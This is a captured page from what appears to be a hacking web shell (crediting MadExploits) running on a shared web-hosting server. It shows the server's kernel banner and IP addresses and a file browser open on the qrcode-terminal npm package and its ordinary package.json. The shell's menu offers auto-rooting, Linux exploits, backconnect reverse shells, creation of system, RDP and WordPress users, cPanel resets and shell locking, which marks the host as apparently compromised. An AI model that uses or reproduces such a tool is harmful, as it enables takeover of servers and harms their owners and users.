Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.145.84.135
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
qrcode-terminal /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
example
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.travis.yml
38
B
-rw-r--r--
LICENSE
11.68
KB
-rw-r--r--
README.md
1.83
KB
-rw-r--r--
package.json
971
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "qrcode-terminal", "keywords": ["ansi", "ascii", "qrcode", "console"], "version" : "0.12.0", "description" : "QRCodes, in the terminal", "homepage": "https://github.com/gtanner/qrcode-terminal", "repository": { "type": "git", "url": "https://github.com/gtanner/qrcode-terminal" }, "contributors": [{ "name": "Gord Tanner", "email": "gtanner@gmail.com", "url": "http://github.com/gtanner" }, { "name": "Michael Brooks", "email": "mikeywbrooks@gmail.com", "url": "http://github.com/mwbrooks" }], "licenses": [{ "type": "Apache 2.0" }], "main": "./lib/main", "bin": { "qrcode-terminal": "./bin/qrcode-terminal.js" }, "preferGlobal": false, "devDependencies": { "sinon": "*", "mocha": "*", "expect.js": "*", "jshint": "*" }, "scripts": { "test": "./node_modules/jshint/bin/jshint lib vendor && node example/basic.js && ./node_modules/mocha/bin/mocha -R nyan" } }
Close